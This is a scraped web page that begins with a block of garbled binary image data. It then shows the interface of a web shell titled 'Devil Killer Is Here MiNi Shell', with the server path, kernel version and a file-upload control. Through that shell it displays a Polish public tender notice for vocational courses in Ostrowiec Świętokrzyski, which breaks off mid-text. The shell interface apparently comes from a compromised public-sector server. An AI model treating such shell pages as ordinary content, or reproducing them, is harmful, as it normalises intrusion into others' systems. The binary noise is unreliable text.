JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20200129/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20200129/507462-N-2020.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 507462-N-2020 z dnia 2020-01-29 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Agencja Rozwoju Lokalnego sp. z o.o.</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">przeprowadzenie kursów i zajęć dla uczestników projektu „BĄDŹ ZAWODOWCEM. Rozwijamy kształcenie zawodowe w Ostrowcu Świętokrzyskim” współfinansowanego </span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Usługi</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Tak</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu">BĄDŹ ZAWODOWCEM. Rozwijamy kształcenie zawodowe w Ostrowcu Świętokrzyskim współfinansowanego ze środków Regionalnego Programu Operacyjnego Województwa Świętokrzyskiego na lata 2014-2020 w ramach Europejskiego Funduszu Społecznego, </span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej – mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Agencja Rozwoju Lokalnego sp. z o.o.</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">29119807700000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">ul. Sandomierska</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">26A</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">27-400</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Ostrowiec Świętokrzyski</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">świętokrzyskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">41 249 50 01; 248 03 70</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">kargulewicz_mrozinska@arl.ostrowiec.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">41 248 03 71</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">www.arl.ostrowiec.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Podmiot prawa publicznego</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">www.arl.ostrowiec.pl/zamowienia-publiczne/ </span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">www.arl.ostrowiec.pl/zamowienia-publiczne/ </span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">pisemnie</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Agencja Rozwoju Lokalnego Sp. z o.o. ul. Sandomierska 26A, 27 - 400 Ostrowiec Św. </span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">przeprowadzenie kursów i zajęć dla uczestników projektu „BĄDŹ ZAWODOWCEM. Rozwijamy kształcenie zawodowe w Ostrowcu Świętokrzyskim” współfinansowanego </span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">ARL/PZP/PN/SZKOL/2020/1</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Usługi</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Tak</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski">wszystkich części</span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy">7</span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">Przedmiotem zamówienia prowadzonego w trybie przetargu nieograniczonego jest przeprowadzenie kursów i zajęć dla uczestników projektu „BĄDŹ ZAWODOWCEM. Rozwijamy kształcenie zawodowe w Ostrowcu Świętokrzyskim” współfinansowanego ze środków Regionalnego Programu Operacyjnego Województwa Świętokrzyskiego na lata 2014-2020 w ramach Europejskiego Funduszu Społecznego, Oś priorytetowa RPSW.08.00.00 Rozwój edukacji i aktywne społeczeństwo, Działanie RPSW.08.05.00 Rozwój i wysoka jakość szkolnictwa zawodowego i kształcenia ustawicznego, Poddziałanie RPSW.08.05.01 Podniesienie jakości kształcenia zawodowego oraz wsparcie na rzecz tworzenia i rozwoju CKZiU (projekty konkursowe) zgodnie z postanowieniami określonymi poniżej:1) Część 1 zamówienia pn. przeprowadzenie kursu Księgowość dla ekonomistów z ECDL Celem kursu jest zapoznanie uczestników (uczniów) z podstawowymi pojęciami oraz operacjami księgowymi z wykorzystaniem programów komputerowych (np. Enova) oraz przygotowanie uczestników do egzaminu ECDL BASE B1-B4. •	Liczba godzin zajęć: 120 •	Termin realizacji: III-VI 2020, w terminach ustalonych z Zamawiającym•	Miejsce realizacji: Ostrowiec Świętokrzyski, osiedle Słoneczne 33 - Kurs przeprowadzany w ZS nr 1 w salach nieodpłatnie udostępnionych na potrzeby realizacji kursu.•	Wymagane zagadnienia do omówienia z uczestnikami: a)	Zagadnienia księgowe – 85 h (45 h teorii, 40 h praktyki)	księgowanie podstawowych operacji gospodarczych; 	sporządzanie prostego sprawozdania finansowego; 	posługiwanie się dokumentami księgowymi i urządzeniami ewidencyjnymi	obsługa programów księgowych. Część zakończona egzaminem wewnętrznym przeprowadzanym przez prowadzącego. b)	Zagadnienia z zakresu obsługi komputera przygotowujące do zdania egzaminu ECDL – 35 h, poziom BASE: B1 , B2, B3, B4.(5 h zajęć teoretycznych, 30 h zajęć praktycznych)	B1 Podstawy pracy z komputerem - Moduł ten obejmuje podstawowe zagadnienia i umiejętności związane z korzystaniem z urządzeń komputerowych, tworzeniem i zarządzaniem plikami oraz bezpieczeństwem danych.	B2 Podstawy pracy w sieci - Moduł ten obejmuje podstawowe zagadnienia i umiejętności związane z Internetem i usługami internetowymi: przeglądaniem Internetu, efektywnym wyszukiwaniem informacji w Internecie, komunikacją online i pocztą elektroniczną.	B3 Przetwarzanie tekstów - Moduł ten pozwala wykazać się znajomością aplikacji do edycji tekstu podczas tworzenia dokumentów, ich formatowania i drukowania.	B4 Arkusze kalkulacyjne - Moduł ten pozwala kandydatowi wykazać się znajomością budowy arkusza kalkulacyjnego, umiejętnościami tworzenia dokumentu, modyfikowania go i dokonywania obliczeń w arkuszu kalkulacyjnym.Uczestnicy szkolenia przystąpią do egzaminu zewnętrznego przed instytucją certyfikującą, którego funkcję pełni Polskie Towarzystwo Informatyczne. Po pozytywnym zdaniu egzaminu uzyskają Certyfikat ECDL BASE, potwierdzający nabycie kwalifikacji w zakresie korzystana z komputera.Harmonogram zajęć obejmować będzie 24 dni zajęć z uwzględnieniem, że uczestnikami kursu są uczniowie szkoły.Zamawiający ponosi koszty ubezpieczenia NNW uczestników, poczęstunku (obiad), pendrivów oraz egzaminu ECDL BASE B1-B4. Zamawiający wydaje certyfikaty dotyczące udziału w szkoleniu. Zamawiający zapewnia komputery z oprogramowaniem księgowym oraz niezbędnym do przygotowania do egzaminu ECDL BASE B1-B42)	Część 2 zamówienia pn. przeprowadzenie kursu fotografia I i II stopnia Celem kursu jest zdobycie wiedzy i umiejętności przez uczestników (uczniów) w zakresie fotografii, komponowania i obróbki obrazu.•	Liczba godzin zajęć: 60 h w każdej edycji,•	Liczba edycji: 2,•	Liczba osób: pierwsza edycja – 15 osób, druga edycja – 10 osób,•	Termin realizacji: III – VI 2020 r., III – VI 2021, r. w terminach ustalonych z Zamawiającym•	Miejsce realizacji: ZS nr 2 – os. Słoneczne 45, 27-400 Ostrowiec Św. a.	Kurs fotografia I stopnia•	Wymagane zagadnienia do omówienia z uczestnikami: 1. Aparat fotograficzny 	Rodzaje, możliwości, wyposażenie.	Obiektywy.	Oświetlenie dodatkowe.	Rodzaje kart pamięci do zapisu zdjęć.	Prawidłowy pomiar ekspozycji.	Zastosowanie filtrów fotograficznych.2. Obraz fotograficzny i jego kompozycja 	Światło w obrazie.	Głębia ostrości.	Perspektywa.	Ruch w obrazie /zamrożony i dynamiczny/.3. Parametry aparatu – wykorzystanie w praktyce 	Ustawianie jakości rejestracji obrazu.	Rejestracja w trybie manualnym i pełnej automatyki.	Kolorystyka zdjęcia a balans bieli.	Korekta balansu bieli automatyczna i wg wzorca.4. Podstawy obróbki i zarządzania zbiorami zdjęć /8 godz./	Podstawowe informacje o korekcie obrazu w programach graficznych – Photoshop, PaintShopPro, Gimp.	Laboratorium fotograficzne – przygotowanie plików.	Samodzielne wydruki – przygotowanie plików.b.	Fotografia II stopnia•	Wymagane zagadnienia do omówienia z uczestnikami: 1. Budowa i zasada działania cyfrowych aparatów fotograficznych 	Sprzęt wspomagający i rozszerzający możliwości aparatu.	Rodzaje oświetlenia zewnętrznego.	Twórcze zastosowane filtrów fotograficznych.2. Kreatywne spojrzenie na tematy zdjęć 3. Cyfrowa ciemnia fotograficzna – Photoshop 	Anatomia obrazu cyfrowego.	Kalibracja monitora.	Przestrzenie barwne / sRgb, RGB, Lab /.	Korekta fragmentu i całego zdjęcia.	Cyfrowa korekta usterek / aberacje, czerwone oczy, itp.	Cyfrowy negatyw – RAW. Potęga możliwości.	Tworzenie montaży, kolaży i kompozycji z fotografii.	Techniki artystyczneUczestnicy szkolenia przystąpią do egzaminu kompetencji przeprowadzony przez prowadzącego. Po zdanym egzaminie uzyskają certyfikat kompetencji wydany przez Zamawiającego. Harmonogram zajęć powinien obejmować 12 dni zajęć z uwzględnieniem, że uczestnikami kursu są uczniowie szkoły.Zamawiający ponosi koszty ubezpieczenia NNW uczestników, poczęstunku (obiad), pendrive’ów. Zamawiający wydaje certyfikaty dotyczące udziału w szkoleniu. Zamawiający zapewnia komputery z oprogramowaniem niezbędnym do przeprowadzenia szkolenia (np. Photoshop, PaintShopPro, Gimp) oraz aparaty fotograficzne (5 sztuk), drukarkę termosublimacyjną. 3)	Część 3 zamówienia pn. "Kurs grafiki komputerowej II i III stopnia" Celem kursu jest zdobycie przez uczestników (uczniów) zaawansowanej wiedzy i umiejętności w zakresie technik transformacji obiektów, zdjęć i rysunków.•	Liczba godzin zajęć: 60 h •	Liczba osób: 15 osób•	Termin realizacji: III – VI 2020 r., w terminach ustalonych z Zamawiającym,•	Miejsce realizacji: ZS nr 2 – os. Słoneczne 45, 27-400 Ostrowiec Św. I.	Kurs grafika komputerowa II stopień•	Liczba godzin: 30•	Wymagane zagadnienia do omówienia z uczestnikami: CorelDraw	1. Zaawansowane techniki transformacji obiektów 	Elementy wspomagające pracę (siatki, prowadnice, linijki)	Konfiguracja programu 	Drukowanie Photoshop	Złożone techniki edycji zdjęć cyfrowych 	Malarstwo cyfrowe 	Wykorzystanie ścieżek 	Zaawansowane techniki pracy z warstwami 	Inne techniki obróbki zdjęć Illustrator	Podstawowe techniki rysownicze	tworzenie figur geometrycznych	typy i zastosowanie pędzli	zastosowanie poleceń do pracy na ścieżkach	techniki rysunku wykorzystujące obiekty pełne (narzędzie do zniekształceń, siatka gradientu)	Efekty specjalne	Malowanie w Illustratorze	Rysowanie piórkiem i ołówkiem	Praca z tekstem	Tworzenie: reklamy, wizytówki, broszuryII.	Grafika komputerowa III stopień•	Wymagane zagadnienia do omówienia z uczestnikami:Photoshop	Narzędzia od grafiki wektorowej: wypełnianie kolorem, zmiana wyglądu konturu, przekształcanie obiektów	Wykorzystanie masek: korekcja przy użyciu maski, tworzenie maski gradientowej	Przygotowanie zdjęć do publikacji: zmiana parametrów zdjęcia (rozdzielczość, wielkość), zmiana modelu koloru	Modele kolorów. Ustawienia użytkownika: modele RGB, CMYK oraz HSB, duotony, praca ze starymi zdjęciami, dobieranie kolorów, wykorzystaniem kanałów, bichromia, stosowanie modelu Lab	Skanowanie obiektów graficznych: działanie i parametry skanerów, techniki skanowania, wskazówki do skanowaniaIllustrator	Wstawianie i techniki pracy z tekstem: otaczanie grafiki tekstem, łączenie grafiki z tekstem, odstępy między obiektami	Warstwy: wstawianie warstw, wykorzystanie warstw	Redakcja techniczna: dobór marginesów, zasady składu tekstów	Poligrafia: zmiana parametrów zdjęć przeznaczonych do druku, przygotowanie publikacji do druku, ustawianie znaczników drukarskich, przygotowanie prac wieloużytkowych	Przygotowanie reklamy Uczestnicy szkolenia przystąpią do egzaminu kompetencji przeprowadzonego przez prowadzącego. Po zdanym egzaminie uzyskają certyfikat kompetencji wydany przez Zamawiającego.Zamawiający zapewnia komputery z oprogramowaniem niezbędnym do przeprowadzenia szkolenia (np. Photoshop, CorelDraw, itp.) oraz tablety graficzne, drukarki. Zamawiający ponosi koszty ubezpieczenia NNW uczestników, poczęstunku (obiad), pendrive’ów. Harmonogram zajęć powinien obejmować 6 dni zajęć z uwzględnieniem, że uczestnikami kursu są uczniowie szkoły.4)	Część 4 zamówienia pn. "Kurs obsługi programu AUTOCAD" Celem kursu jest zapoznanie uczestnika z podstawowymi i zaawansowanymi poleceniami i funkcjami programu AutoCAD•	Liczba godzin: 45 h w każdej edycji,•	Liczba edycji: 2,•	Termin realizacji: III –VI 2020 r., III –VI 2021 r., w terminach ustalonych z Zamawiającym,•	Miejsce realizacji: ZS nr 2 – os. Słoneczne 45, 27-400 Ostrowiec Św.•	Wymagane zagadnienia do omówienia z uczestnikami:Interfejs programu AutoCAD 	Wygląd głównego okna aplikacji: Paski narzędzi, Kursor i Obszar roboczy, Zakładki, Linia poleceń, Pasek stanu – klawisze funkcyjne, Klawisz Escape Lokalny układ współrzędnych (LUW)	Dopasowanie programu do własnych potrzeb (zmiana wyglądu głównego okna aplikacji, dostosowanie pasków narzędzi, tworzenie własnych pasków narzędzi)	Tworzenie rysunków (używanie standardu, szablony, kreatory)	Otwieranie rysunków istniejących w formacie DWG	Zapisywanie rysunków w dowolnych formatachTworzenie podstawowych obiektów 	Rysowanie linii / prostej / multilinii / polilinii	Metody oglądania rysunku ZOOM, PAN	Rysowanie okręgu / łuku / elipsy	Rysowanie wieloboku / prostokąta / splajnuEdycja obiektów 	wymaż / kopiuj / przesuń / obrót	lustro / odsuń /szyk	utnij / wydłuż / przedłuż /rozciągnij / przerwij	tryby lokalizacji względem obiektu	omówienie uchwytów	skala /fazuj / zaokrągl	Zmienne systemoweWymiarowanie	wymiarowanie kątowe, baza, szybka linia odniesienia, szeregowe	rysowanie odnośników, tolerancja (kolor odnośników	edycja napisu wymiarowego	obracanie napisu, przesuwanie wymiaru	tworzenie nowego stylu wymiarowego	zaokrąglanie wartości wymiarowej	zmiana czcionki wymiarowej	szybkie wymiarowanieWarstwy 	tworzenie nowej linii / Kolor / Rodzaj linii / Szerokość linii / Styl kreślenia	jak utworzyć atrybut	jak umieścić atrybuty w bloku	atrybut widoczny i niewidoczny	modyfikacja atrybutu (zmiana nazwy, rodzaj)	Warstwa Widoczna/Ukryta	Zablokuj/Odblokuj we wszystkich rzutniach	Zamknij/OtwórzTekst 	